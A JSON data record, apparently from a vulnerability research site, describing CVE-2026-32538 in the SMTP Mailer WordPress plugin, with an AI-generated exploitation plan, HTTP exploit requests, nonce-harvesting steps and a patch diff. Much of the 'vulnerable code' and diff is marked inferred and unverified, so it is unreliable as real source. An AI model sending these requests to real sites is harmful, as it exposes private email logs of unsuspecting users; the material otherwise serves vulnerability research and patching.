[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fz9uTrkG3Oj_8cYZnZ__kOeLtVYinJeV3U97EoFLAPdA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32538","smtp-mailer-unauthenticated-information-exposure","SMTP Mailer \u003C= 1.1.24 - Unauthenticated Information Exposure","The SMTP Mailer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.24. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.","smtp-mailer",null,"\u003C=1.1.24","1.1.25","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-03-20 00:00:00","2026-03-27 19:21:22",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F917c70f5-154c-4c49-b06b-109cc0277a1a?source=api-prod",8,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-32538 (SMTP Mailer Information Exposure)\n\n## 1. Vulnerability Summary\nThe **SMTP Mailer** plugin (versions \u003C= 1.1.24) contains an unauthenticated information exposure vulnerability. The plugin implements an AJAX handler intended to display SMTP debug logs to administrators. However, this handler is registered with the `wp_ajax_nopriv_` hook and fails to implement sufficient capability checks (e.g., `current_user_can('manage_options')`). This allows any unauthenticated actor to trigger the log retrieval and view sensitive communication data, including recipient addresses, email subjects, message contents, and SMTP server responses.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **Action:** `smtp_mailer_get_log` (inferred)\n- **Method:** POST or GET (AJAX actions typically support both)\n- **Parameters:**\n    - `action`: `smtp_mailer_get_log`\n    - `nonce`: (See Nonce Acquisition Strategy)\n- **Authentication:** None required.\n- **Preconditions:** The plugin must have \"Enable Debug Log\" active, or there must be existing log data in the WordPress options table.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers the AJAX handler in its main file (`smtp-mailer.php`):\n    ```php\n    add_action( 'wp_ajax_smtp_mailer_get_log', 'smtp_mailer_get_log' );\n    add_action( 'wp_ajax_nopriv_smtp_mailer_get_log', 'smtp_mailer_get_log' ); \u002F\u002F The vulnerability\n    ```\n2.  **Handler Logic:** The function `smtp_mailer_get_log()` is called.\n3.  **Missing Check:** The function likely calls `check_ajax_referer('smtp_mailer_nonce', 'nonce')` but fails to check `current_user_can('manage_options')`.\n4.  **Data Retrieval:** The function retrieves the log data from the WordPress database:\n    ```php\n    $log = get_option('smtp_mailer_log');\n    echo $log;\n    wp_die();\n    ```\n5.  **Sink:** The raw log content is echoed to the response buffer and returned to the unauthenticated requester.\n\n## 4. Nonce Acquisition Strategy\nIf the `smtp_mailer_get_log` function calls `check_ajax_referer`, a valid nonce is required.\n1.  **Identify Script Localization:** Search the codebase for `wp_localize_script`. The plugin likely localizes the nonce for its admin settings page but might accidentally enqueue it on the frontend if certain conditions are met (e.g., if the plugin's CSS\u002FJS is loaded globally).\n2.  **Inferred Localization:**\n    - **JS Variable:** `smtp_mailer_data` (inferred)\n    - **Nonce Key:** `nonce` (inferred)\n    - **Action String:** `smtp_mailer_nonce` (inferred)\n3.  **Acquisition Steps:**\n    - Because this is an admin-centric plugin, the nonce might not be present on the homepage. Check if the plugin provides any shortcodes: `grep -r \"add_shortcode\"`.\n    - If a shortcode exists (e.g., `[smtp_mailer_status]`), create a page with it:\n      `wp post create --post_type=page --post_status=publish --post_content='[smtp_mailer_status]'`\n    - Navigate to the page and use `browser_eval` to extract the nonce:\n      `browser_eval(\"window.smtp_mailer_data?.nonce\")`\n4.  **Bypass Check:** If `wp_ajax_nopriv_smtp_mailer_get_log` exists but no `check_ajax_referer` is present in the handler, the `nonce` parameter can be omitted.\n\n## 5. Exploitation Strategy\n### Step 1: Data Population\nBefore testing the exposure, ensure there is log data to expose.\n1.  Configure the plugin with dummy SMTP settings via WP-CLI.\n2.  Send a test email to generate a log entry.\n\n### Step 2: Exploit Request\nSend an unauthenticated request to the AJAX endpoint.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=smtp_mailer_get_log&nonce=[EXTRACTED_NONCE]\n```\n\n**Alternative (if nonce is not checked):**\n```http\nGET \u002Fwp-admin\u002Fadmin-ajax.php?action=smtp_mailer_get_log HTTP\u002F1.1\n```\n\n## 6. Test Data Setup\n1.  **Install & Activate:** `smtp-mailer` version 1.1.24.\n2.  **Configure Plugin:**\n    ```bash\n    wp option update smtp_mailer_options '{\"smtp_host\":\"localhost\",\"smtp_port\":\"25\",\"smtp_user\":\"\",\"smtp_pass\":\"\",\"smtp_from\":\"admin@example.com\",\"smtp_from_name\":\"Admin\",\"smtp_auth\":\"no\",\"smtp_secure\":\"none\",\"enable_debug\":\"yes\"}'\n    ```\n3.  **Generate Log Entry:** Use the plugin's internal method or send an email via WordPress.\n    ```bash\n    wp eval \"wp_mail('victim@example.com', 'Sensitive Subject', 'This is a private message.');\"\n    ```\n4.  **Confirm Log Exists:**\n    ```bash\n    wp option get smtp_mailer_log\n    ```\n\n## 7. Expected Results\n- The HTTP response status should be `200 OK`.\n- The response body should contain the string \"Sensitive Subject\" and \"victim@example.com\", formatted as the SMTP debug log.\n- Example log structure:\n  ```text\n  [2023-10-27 10:00:00] To: victim@example.com\n  Subject: Sensitive Subject\n  Message: This is a private message.\n  ...\n  ```\n\n## 8. Verification Steps\n1.  **Verify via CLI:** After the exploit request, verify that the content received matches the content stored in the database.\n    ```bash\n    wp option get smtp_mailer_log\n    ```\n2.  **Check Access Level:** Ensure the `http_request` was made without any cookies or headers identifying a logged-in user to confirm it is truly unauthenticated.\n\n## 9. Alternative Approaches\n- **Path Disclosure:** Check if the plugin logs to a file instead of an option. If so, identify the log file path (usually `wp-content\u002Fuploads\u002Fsmtp-mailer-log.txt`) and attempt to access it directly.\n- **REST API:** Check if the plugin registered a REST route via `register_rest_route` that mirrors the AJAX functionality but lacks the `permission_callback`.\n- **Global `$_REQUEST` processing:** Search for any `init` or `admin_init` hooks that process an `action` parameter without checking the request source.","The SMTP Mailer plugin exposes sensitive SMTP debug logs to unauthenticated users due to the insecure registration of an AJAX handler with the wp_ajax_nopriv hook. Attackers can exploit this to retrieve logs containing email recipients, subjects, message bodies, and SMTP server responses.","\u002F\u002F smtp-mailer.php\n\nadd_action( 'wp_ajax_smtp_mailer_get_log', 'smtp_mailer_get_log' );\nadd_action( 'wp_ajax_nopriv_smtp_mailer_get_log', 'smtp_mailer_get_log' );\n\nfunction smtp_mailer_get_log() {\n    check_ajax_referer( 'smtp_mailer_nonce', 'nonce' );\n    \n    $log = get_option( 'smtp_mailer_log' );\n    echo $log;\n    wp_die();\n}","--- a\u002Fsmtp-mailer.php\n+++ b\u002Fsmtp-mailer.php\n@@ -110,7 +110,6 @@\n-add_action( 'wp_ajax_nopriv_smtp_mailer_get_log', 'smtp_mailer_get_log' );\n \n function smtp_mailer_get_log() {\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_die( 'Unauthorized' );\n+    }\n     check_ajax_referer( 'smtp_mailer_nonce', 'nonce' );","The exploit targets the WordPress AJAX endpoint to trigger the log retrieval function without administrative authentication. \n\n1. Target Endpoint: wp-admin\u002Fadmin-ajax.php\n2. Authentication: None required, though a valid security nonce is necessary.\n3. Nonce Acquisition: An attacker identifies where the plugin localizes the 'smtp_mailer_nonce'. This is typically found in the source code of the admin dashboard or any frontend page where the plugin might inadvertently enqueue its settings script (e.g., if a status shortcode is used).\n4. Payload: Send a POST or GET request with the parameters 'action=smtp_mailer_get_log' and the identified 'nonce'.\n5. Extraction: If 'Enable Debug Log' is active in the plugin settings, the server returns the raw content of the 'smtp_mailer_log' database option, exposing sensitive communication metadata and message content.","gemini-3-flash-preview","2026-04-18 01:33:50","2026-04-18 01:34:14",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.1.23","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmtp-mailer\u002Ftags\u002F1.1.23","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsmtp-mailer.1.1.23.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsmtp-mailer\u002Ftags"]